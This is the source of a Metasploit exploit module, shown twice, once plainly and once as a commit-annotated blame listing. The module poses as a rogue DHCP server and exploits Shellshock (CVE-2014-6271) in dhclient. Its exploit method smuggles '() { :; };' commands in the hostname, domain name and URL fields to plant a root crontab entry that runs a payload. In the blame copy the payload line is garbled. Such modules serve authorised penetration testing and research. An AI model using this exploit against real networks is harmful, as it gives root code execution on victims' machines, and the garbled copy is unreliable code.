metasploit-framework/modules/exploits/unix/dhcp/bash_environment.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/proto/dhcp'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::DHCPServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dhclient Bash Environment Variable Injection (Shellshock)',
      'Description'    => %q|
        This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
        handles external environment variables. This module targets dhclient by responding
        to DHCP requests with a malicious hostname, domainname, and URL which are then
        passed to the configuration scripts as environment variables, resulting in code
        execution. Due to length restrictions and the unusual networking scenario at the
        time of exploitation, this module achieves code execution by writing the payload
        into /etc/crontab and then cleaning it up after a session is created.
      |,
      'Author'         =>
        [
          'Stephane Chazelas', # Vulnerability discovery
          'egypt' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'References'     =>
        [
          ['CVE', '2014-6271'],
          ['CWE', '94'],
          ['OSVDB', '112004'],
          ['EDB', '34765'],
          ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],
          ['URL', 'http://seclists.org/oss-sec/2014/q3/649'],
          ['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/']
        ],
      'Payload'        =>
        {
          # 255 for a domain name, minus some room for encoding
          'Space'       => 200,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic telnet ruby',
            }
        },
      'Targets'        => [ [ 'Automatic Target', { }] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 24 2014'
    ))

    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
  end

  def on_new_session(session)
    print_status "Cleaning up crontab"
    # XXX this will brick a server some day
    session.shell_command_token("sed -i '/^\\* \\* \\* \\* \\* root/d' /etc/crontab")
  end

  def exploit
    hash = datastore.copy
    # Quotes seem to be completely stripped, so other characters have to be
    # escaped
    p = payload.encoded.gsub(/([<>()|'&;$])/) { |s| Rex::Text.to_hex(s) }
    echo = "echo -e #{(Rex::Text.to_hex("*") + " ") * 5}root #{p}>>/etc/crontab"
    hash['DOMAINNAME'] = "() { :; };#{echo}"
    if hash['DOMAINNAME'].length > 255
      raise ArgumentError, 'payload too long'
    end

    hash['HOSTNAME'] = "() { :; };#{echo}"
    hash['URL'] = "() { :; };#{echo}"
    start_service(hash)

    begin
      while @dhcp.thread.alive?
        sleep 2
      end
    ensure
      stop_service
    end
  end

end
Add DHCP server module for CVE-2014-6271 2014-09-26 06:24:42 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Add DHCP server module for CVE-2014-6271 2014-09-26 06:24:42 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'rex/proto/dhcp'`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Add DHCP server module for CVE-2014-6271 2014-09-26 06:24:42 +00:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::DHCPServer`

			`def initialize(info = {})`
			`super(update_info(info,`
Update Shellshock modules, add Advantech coverage 2015-12-01 16:40:46 +00:00			`'Name' => 'Dhclient Bash Environment Variable Injection (Shellshock)',`
Add DHCP server module for CVE-2014-6271 2014-09-26 06:24:42 +00:00			`'Description' => %q\|`
Update Shellshock modules, add Advantech coverage 2015-12-01 16:40:46 +00:00			`This module exploits the Shellshock vulnerability, a flaw in how the Bash shell`
			`handles external environment variables. This module targets dhclient by responding`
			`to DHCP requests with a malicious hostname, domainname, and URL which are then`
			`passed to the configuration scripts as environment variables, resulting in code`
			`execution. Due to length restrictions and the unusual networking scenario at the`
			`time of exploitation, this module achieves code execution by writing the payload`
			`into /etc/crontab and then cleaning it up after a session is created.`
Add DHCP server module for CVE-2014-6271 2014-09-26 06:24:42 +00:00			`\|,`
Credit the original vuln discoverer 2014-09-26 18:45:09 +00:00			`'Author' =>`
			`[`
			`'Stephane Chazelas', # Vulnerability discovery`
			`'egypt' # Metasploit module`
			`],`
Add DHCP server module for CVE-2014-6271 2014-09-26 06:24:42 +00:00			`'License' => MSF_LICENSE,`
			`'Platform' => ['unix'],`
			`'Arch' => ARCH_CMD,`
			`'References' =>`
			`[`
Add OSVDB and EDB references to Shellshock modules 2014-09-30 02:31:31 +00:00			`['CVE', '2014-6271'],`
Update Shellshock modules, add Advantech coverage 2015-12-01 16:40:46 +00:00			`['CWE', '94'],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`['OSVDB', '112004'],`
Update Shellshock modules, add Advantech coverage 2015-12-01 16:40:46 +00:00			`['EDB', '34765'],`
			`['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],`
			`['URL', 'http://seclists.org/oss-sec/2014/q3/649'],`
			`['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/']`
Add DHCP server module for CVE-2014-6271 2014-09-26 06:24:42 +00:00			`],`
			`'Payload' =>`
			`{`
			`# 255 for a domain name, minus some room for encoding`
			`'Space' => 200,`
			`'DisableNops' => true,`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
Fix #5659: Update CMD exploits payload compatibility options 2015-08-10 22:12:59 +00:00			`'RequiredCmd' => 'generic telnet ruby',`
Add DHCP server module for CVE-2014-6271 2014-09-26 06:24:42 +00:00			`}`
			`},`
			`'Targets' => [ [ 'Automatic Target', { }] ],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Sep 24 2014'`
			`))`

deregister options needed for exploitation 2014-09-26 15:15:46 +00:00			`deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')`
Add DHCP server module for CVE-2014-6271 2014-09-26 06:24:42 +00:00			`end`

			`def on_new_session(session)`
			`print_status "Cleaning up crontab"`
			`# XXX this will brick a server some day`
			`session.shell_command_token("sed -i '/^\\* \\* \\* \\* \\* root/d' /etc/crontab")`
			`end`

			`def exploit`
			`hash = datastore.copy`
			`# Quotes seem to be completely stripped, so other characters have to be`
			`# escaped`
			`p = payload.encoded.gsub(/([<>()\|'&;$])/) { \|s\| Rex::Text.to_hex(s) }`
			`echo = "echo -e #{(Rex::Text.to_hex("") + " ") 5}root #{p}>>/etc/crontab"`
			`hash['DOMAINNAME'] = "() { :; };#{echo}"`
			`if hash['DOMAINNAME'].length > 255`
			`raise ArgumentError, 'payload too long'`
			`end`
Add injection to HOSTNAME and URL 2014-09-26 15:13:24 +00:00
			`hash['HOSTNAME'] = "() { :; };#{echo}"`
			`hash['URL'] = "() { :; };#{echo}"`
Add DHCP server module for CVE-2014-6271 2014-09-26 06:24:42 +00:00			`start_service(hash)`

			`begin`
			`while @dhcp.thread.alive?`
			`sleep 2`
			`end`
			`ensure`
			`stop_service`
			`end`
			`end`

			`end`